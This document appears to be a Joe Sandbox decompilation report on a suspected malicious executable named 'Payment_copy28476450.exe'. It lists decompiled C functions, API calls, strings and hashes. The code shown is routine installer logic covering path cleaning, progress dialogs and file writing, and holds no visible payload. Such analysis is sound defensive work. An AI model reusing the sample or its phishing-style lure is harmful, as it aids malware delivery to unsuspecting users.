0x00000000
0x00000000
0x00000000
0x00405eb0
0x00405e69
0x00405e6c
0x00000000
0x00000000
0x00405e7b
0x00405e7d
0x00405e7f
0x00000000
0x00000000
0x00000000
0x00405e7f
0x00000000
0x00405eb5
0x00405e40
0x00000000
0x00405dfe
0x00405e03
0x00405e19
0x00405e1e
0x00405e21
0x00405ebe
0x00405ebe
0x00405ec2
0x00405eca
0x00405eca
0x00000000
0x00405ec2
0x00405e2b
0x00405eb9
0x00405eb9
0x00405ebc
0x00000000
0x00000000
0x00000000
0x00405ebc
0x00405dfc
0x00405dcf
0x00405dd3
0x00000000
0x00000000
0x00405dd5
0x00405dd9
0x00000000
0x00000000
0x00405ddb
0x00405ddf
0x00000000
0x00405de1
0x00405de1
0x00000000
0x00405de1
0x00405ddf
0x00405f44
0x00405f4e
0x00405f5a
0x00405f5a
0x00000000

APIs

GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
GetSystemDirectoryA.KERNEL32 ref: 00405E40
GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
CoTaskMemFree.OLE32(00000000), ref: 00405EA8
lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C

Strings

/B, xrefs: 00405D46
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0F
/B, xrefs: 00405F26
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC4

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1912783298
Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405f5f
0x00405f67
0x00405f7b
0x00405f7b
0x00405f81
0x00405f8e
0x00405f8e
0x00405f8f
0x00405f91
0x00405f95
0x00405f97
0x00405fa0
0x00405fa2
0x00405fbc
0x00405fc4
0x00405fc4
0x00405fc9
0x00405fcb
0x00405fcd
0x00405fd1
0x00405fd2
0x00405fd5
0x00405fdd
0x00405fdf
0x00405fe3
0x00000000
0x00000000
0x00405fe9
0x00405fee
0x00000000
0x00000000
0x00000000
0x00405fee
0x00405ff3

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_copy28476450.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_copy28476450.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7

Strings

*?|<>/":, xrefs: 00405FA5
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F5E, 00405F63
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00405F99

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Payment_copy28476450.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3246680934
Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00404030
0x004040c4
0x00000000
0x004040c4
0x00404041
0x00404045
0x00000000
0x00000000
0x0040404b
0x00404054
0x00404057
0x00404057
0x0040405d
0x00404063
0x00404063
0x0040406f
0x00404075
0x0040407c
0x0040407f
0x00404082
0x00404084
0x00404084
0x0040408c
0x00404092
0x00404092
0x0040409c
0x004040a1
0x004040a4
0x004040a9
0x004040ac
0x004040ac
0x004040bc
0x004040bc
0x00000000

APIs

GetWindowLongA.USER32 ref: 0040403B
GetSysColor.USER32(00000000), ref: 00404057
SetTextColor.GDI32(?,00000000), ref: 00404063
SetBkMode.GDI32(?,?), ref: 0040406F
GetSysColor.USER32(?), ref: 00404082
SetBkColor.GDI32(?,?), ref: 00404092
DeleteObject.GDI32(?), ref: 004040AC
CreateBrushIndirect.GDI32(?), ref: 004040B6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00402692
0x00402694
0x004026a0
0x004026a3
0x004026ad
0x004026b1
0x004026b1
0x004026b7
0x004026c4
0x004026cc
0x004026cf
0x004026d5
0x004026e3
0x004026e8
0x004026ec
0x004026ef
0x004026f8
0x00402704
0x00402708
0x0040270b
0x00402715
0x00402734
0x0040271c
0x00402721
0x00402729
0x0040272c
0x00402731
0x00402731
0x0040273b
0x0040273b
0x0040274d
0x00402754
0x00402766
0x00402766
0x0040276c
0x0040276c
0x00402777
0x00402778
0x0040277c
0x00402780
0x00402786
0x00402786
0x0040278d
0x0040217a
0x004028a4
0x004028b0

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
GlobalFree.KERNEL32 ref: 0040273B
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
GlobalFree.KERNEL32 ref: 00402754
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404fed
0x00404ff9
0x00404ffc
0x00405002
0x0040500e
0x00405011
0x00405014
0x0040501a
0x0040501a
0x00405020
0x00405028
0x0040502b
0x00405048
0x0040504c
0x00405055
0x00405055
0x0040505f
0x00405068
0x00405074
0x0040507b
0x0040507f
0x00405082
0x00405095
0x004050a3
0x004050a3
0x004050a7
0x004050a9
0x004050ac
0x00000000
0x004050ac
0x0040502d
0x00405035
0x0040503d
0x00405043
0x00000000
0x00405043
0x0040503d
0x0040502b
0x004050b6

APIs

lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88;
					if( *0x423f88 == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bf5
0x00402bf7
0x00402bfe
0x00402c01
0x00402c01
0x00402c07
0x00000000
0x00402c07
0x00402c0f
0x00402c15
0x00000000
0x00402c18
0x00402c1f
0x00402c25
0x00402c2b
0x00402c2d
0x00402c33
0x00402c71
0x00402c7a
0x00000000
0x00402c7f
0x00402c35
0x00402c3c
0x00402c4d
0x00000000
0x00402c5b
0x00402c3c
0x00402c87

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402C01
GetTickCount.KERNEL32 ref: 00402C1F
wsprintfA.USER32 ref: 00402C4D

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3

CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
ShowWindow.USER32(00000000,00000005), ref: 00402C7F

Part of subcall function 00402BCD: MulDiv.KERNEL32(0004C4B0,00000064,?), ref: 00402BE2

Strings

... %d%%, xrefs: 00402C47

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE

Uniqueness

Uniqueness Score: -1.00%

Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004048c4
0x004048d1
0x004048d7
0x00404915
0x00404915
0x00404924
0x0040492b
0x00000000
0x0040492d
0x004048d9
0x004048e8
0x004048f0
0x004048f3
0x00404905
0x0040490b
0x00404912
0x00000000
0x00404912
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
GetMessagePos.USER32 ref: 004048D9
ScreenToClient.USER32 ref: 004048F3
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B

Strings

f, xrefs: 00404907

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b5e
0x00402b6c
0x00402b72
0x00402b72
0x00402b80
0x00402b82
0x00402b8e
0x00402b93
0x00402b95
0x00402b95
0x00402ba0
0x00402bb0
0x00402bc2
0x00402bc2
0x00402bca

APIs

SetTimer.USER32 ref: 00402B6C
wsprintfA.USER32 ref: 00402BA0
SetWindowTextA.USER32(?,?), ref: 00402BB0
SetDlgItemTextA.USER32 ref: 00402BC2

Strings

unpacking data: %d%%, xrefs: 00402B8E, 00402B9E
verifying installer: %d%%, xrefs: 00402B95

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
